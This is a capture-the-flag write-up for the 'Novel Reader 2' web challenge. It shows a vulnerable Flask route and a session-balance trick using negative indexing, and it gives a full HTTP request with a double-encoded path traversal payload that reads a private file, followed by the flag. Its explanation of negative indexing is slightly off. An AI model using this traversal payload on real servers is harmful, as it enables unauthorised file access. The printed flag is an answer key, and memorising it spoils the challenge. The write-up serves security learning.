Novel Reader 2

Web Challenge

In Novel Reader 2, all you have to do is show the content of a private novel, but to do so, you need to ensure you have sufficient balance.

```
@app.get('/api/read/<path:name>')
def readNovel(name):
    name = unquote(name)
    if(not name.startswith('public/')):
        return {'success': False, 'msg': 'You can only read public novels!'}, 400
    buf = readFile(name).split(' ')
    buf = ' '.join(buf[0:session['words_balance']])+'... Charge your account to unlock more of the novel!'
    return {'success': True, 'msg': buf} 
```

However, there is a negative indexing feature in Python, which will give access to the second last index if you use the value. -1

Once you manage to do so, use the double encoding method to access the private novel reader file.

GET /api/read/public/%252e%252e%252f/private/A-Secret-Tale.txt HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en
Connection: keep-alive
Cookie: session=eyJjcmVkaXQiOjEwMCwid29yZHNfYmFsYW5jZSI6MX0.Za000Q.zcBtJvYM3vXoJBf_o6j8gd_g9n4
Host: 3.64.250.135:9000
Referer: http://3.64.250.135:9000/
Sec-GPC: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest

MAPNA{uhhh-y0u-607-m3-4641n-3f4b38571}

PreviousNovel Reader NextFlag Holding

Last updated 1 year ago